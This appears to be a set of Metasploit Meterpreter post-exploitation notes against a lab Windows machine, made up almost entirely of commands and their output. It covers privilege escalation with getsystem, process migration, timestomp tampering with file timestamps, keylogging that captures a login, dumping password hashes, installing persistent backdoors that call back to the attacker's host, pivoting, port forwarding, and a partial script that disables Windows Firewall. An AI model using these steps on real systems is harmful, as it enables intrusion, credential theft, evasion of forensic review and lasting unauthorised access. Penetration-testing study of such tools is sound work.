1.Privelege escalation and process migration :

meterpreter > getsystem h

Usage: getsystem [options]

Attempt to elevate your privilege to that of local system.

OPTIONS:
    -t <opt>  The technique to use. (Default to '0').

    0 : All techniques available
    1 : Service - Named Pipe Impersonation (In Memory/Admin)
    2 : Service - Named Pipe Impersonation (Dropper/Admin)
    3 : Service - Token Duplication (In Memory/Admin)
    4 : Exploit - KiTrap0D (In Memory/User)

meterpreter > getuid
Server username: DARKLORD-PC\DARKLORD

meterpreter > getsystem
...got system (via technique 1).

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > migrate 2084
[*] Migrating to 2084...
[*] Migration completed successfully.

-----------------------------------------------------------------------
2. Setting up multiple communication channels with target

meterpreter > execute h

Usage: execute -f file [options]

Executes a command on the remote machine.

OPTIONS:

    -H        Create the process hidden from view.
    -a <opt>  The arguments to pass to the command.
    -c        Channelized I/O (required for interaction).
    -d <opt>  The 'dummy' executable to launch when using -m.
    -f <opt>  The executable command to run.
    -h        Help menu.
    -i        Interact with the process after creating it.
    -k        Execute process on the meterpreters current desktop
    -m        Execute from memory.
    -s <opt>  Execute process in a given session as the session user
    -t        Execute process with currently impersonated thread token

meterpreter > execute -f notepad.exe c

Process 5708 created.
Channel 1 created.

meterpreter > execute -f cmd.exe c

Process 4472 created.
Channel 2 created.

meterpreter > execute -f calc.exe c

Process 6000 created.
Channel 3 created.

meterpreter > write 5

Enter data followed by a '.' on an empty line:

Metasploit!!
.
[*] Wrote 13 bytes to channel 5.

meterpreter > interact 2
Interacting with channel 2...

Microsoft Windows [Version 6.1.7264]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\DARKLORD\Desktop>
------------------------------------------------------------------------

3. Changing the attributes using timestomp

meterpreter > timestomp d:\secret.doc v

Modified      : 2011-12-12 16:37:48 +0530
Accessed      : 2011-12-12 16:37:48 +0530
Created       : 2011-12-12 16:37:47 +0530
Entry Modified: 2011-12-12 16:47:56 +0530

meterpreter > timestomp d:\secret.doc -c  "3/13/2013 13:13:13"
[*] Setting specific MACE attributes on d:secret.doc

meterpreter > timestomp d:\secret.doc -m "3/13/2013 13:13:23"

[*] Setting specific MACE attributes on d:secret.doc

meterpreter > timestomp d:\secret.doc -a "3/13/2013 13:13:33"

[*] Setting specific MACE attributes on d:secret.doc

meterpreter > timestomp d:\secret.doc v

Modified      : 2013-03-13 13:13:13 +0530
Accessed      : 2013-03-13 13:13:23 +0530
Created       : 2013-03-13 13:13:33 +0530
Entry Modified: 2013-03-13 13:13:13 +0530
-----------------------------------------------------------------------

4. The getdesktop and keystroke sniffing

meterpreter > enumdesktops

Enumerating all accessible desktops

Desktops
========

    Session  Station   Name
    -------  -------   ----
    0        WinSta0   Default
    0        WinSta0   Disconnect
    0        WinSta0   Winlogon
    0        SAWinSta  SADesktop

meterpreter > getdesktop
Session 0\Service-0x0-3e7$\Default

meterpreter > getdesktop

Session 0\Service-0x0-3e7$\Default

meterpreter > setdesktop
Changed to desktop WinSta0\Default

meterpreter > getdesktop
Session 0\WinSta0\Default

meterpreter > keyscan_start
Starting the keystroke sniffer...

meterpreter > keyscan_dump
Dumping captured keystrokes...

gmail.com <Return> daklord <Tab> 123123


meterpreter > migrate 1180
[*] Migrating to 1180...
[*] Migration completed successfully.

meterpreter > getdesktop
Session 0\WinSta0\Winlogon

meterpreter > migrate 884
[*] Migrating to 884...
[*] Migration completed successfully.

meterpreter > getdesktop
Session 0\WinSta0\Default
---------------------------------------------------------------

5. Using a scraper meterpreter script

meterpreter > run scraper

[*] New session on 192.168.56.1:4232...
[*] Gathering basic system information...
[*] Error dumping hashes: Rex::Post::Meterpreter::RequestError priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.
[*] Obtaining the entire registry...
[*]  Exporting HKCU
[*]  Downloading HKCU (C:\Users\DARKLORD\AppData\Local\Temp\UKWKdpIb.reg)
-------------------------------------------------------------------------

6. Passing the hash

meterpreter > getuid
Server username: DARKLORD-PC\DARKLORD

meterpreter > getsystem
...got system (via technique 4).

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > run hashdump

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 78e1241e98c23002bc85fd94c146309d...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...

Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DARKLORD:1000:aad3b435b51404eeaad3b435b51404ee:3dbde697d71690a769204beb12283678:::
----------------------------------------------------------------------------------

7. Setting up a persistent conection with backdoors

meterpreter > run metsvc -h

OPTIONS:

    -A        Automatically start a matching multi/handler to connect to the service
    -h        This help menu
    -r        Uninstall an existing Meterpreter service (files must be deleted manually)


meterpreter > run metsvc A

[*] Creating a meterpreter service on port 31337
[*] Creating a temporary installation directory C:\Users\DARKLORD\AppData\Local\Temp\ygLFhIFX...
[*]  >> Uploading metsrv.dll...
[*]  >> Uploading metsvc-server.exe...
[*]  >> Uploading metsvc.exe...
[*] Starting the service...
	 * Installing service metsvc
 * Starting service
Service metsvc successfully installed.


meterpreter > run persistence h

Meterpreter Script for creating a persistent backdoor on a target host.

OPTIONS:

    -A        Automatically start a matching multi/handler to..
    -L <opt>  Location in target host where to write payload to..
    -P <opt>  Payload to use, default is    
    -S        Automatically start the agent on boot as a service 
    -T <opt>  Alternate executable template to use
    -U        Automatically start the agent when the User logs on
    -X        Automatically start the agent when the system boots
    -h        This help menu
    -i <opt>  The interval in seconds between each connection 
    -p <opt>  The port on the remote host where Metasploit..
    -r <opt>  The IP of the system running Metasploit listening..


meterpreter > run persistence -A -S -U -i 60 -p 4321 r 192.168.56.101
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/DARKLORD-PC_20111227.0307/DARKLORD-PC_20111227.0307.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.56.101 LPORT=4321
[*] Persistent agent script is 610795 bytes long
[+] Persistent Script written to C:\Users\DARKLORD\AppData\Local\Temp\LHGtjzB.vbs
[*] Starting connection handler at port 4321 for windows/meterpreter/reverse_tcp
[+] Multi/Handler started!
[*] Executing script C:\Users\DARKLORD\AppData\Local\Temp\LHGtjzB.vbs
[+] Agent executed with PID 5712
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\DBDalcOoYlqJSi
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\DBDalcOoYlqJSi
[*] Installing as service..
[*] Creating service cpvPbOfXj
------------------------------------------------------------------------------

8. Pivoting with meterpreter

meterpreter > run arp_scanner -r 10.0.2.1/24

[*] ARP Scanning 10.0.2.1/24
[*] IP: 10.0.2.7 MAC 8:26:18:41:fb:33
[*] IP: 10.0.2.9 MAC 41:41:41:41:41:41
meterpreter > background
msf  exploit(handler) > route add 10.0.2.15 255.255.255.0 1

[*] Route added

msf  exploit(handler) > route print

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   10.0.2.15          255.255.255.0      Session 1

--------------------------------------------------------------------------------------

9. Port forwarding with meterpreter

msf  exploit(handler) > route print

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   10.0.2.15          255.255.255.0      Session 1

meterpreter > portfwd -h
Usage: portfwd [-h] [add | delete | list | flush] [args]


OPTIONS:

    -L <opt>  The local host to listen on (optional).
    -h        Help banner.
    -l <opt>  The local port to listen on.
    -p <opt>  The remote port to connect to.
    -r <opt>  The remote host to connect to.

meterpreter > portfwd add -l 4321 -p 80 -r 10.0.2.7

[*] Local TCP relay created: 0.0.0.0:4321 <-> 10.0.2.7:80
---------------------------------------------------------------------------------------------

10. Building a Windows Firewall De-activator meterpreter script

# Windows Firewall De-Activator

#Option/parameter Parsing

opts = Rex::Parser::Arguments.new(
	"-h" => [ false, "Help menu." ]
)

opts.parse(args) { |opt, idx, val|
	case opt
	when "-h"
		print_line "Meterpreter Script for disabling the Default windows Firelwall"
		print_line "Let's hope it works"
		print_line(opts.usage)
		raise Rex::Script::Completed
	end
}

# OS validation and command execution

unsupported if client.platform !~ /win32|win64/i
	end
	begin
		print_status("disabling the default firewall")
		cmd_exec('cmd /c','netsh advfirewall set AllProfiles state off',5)


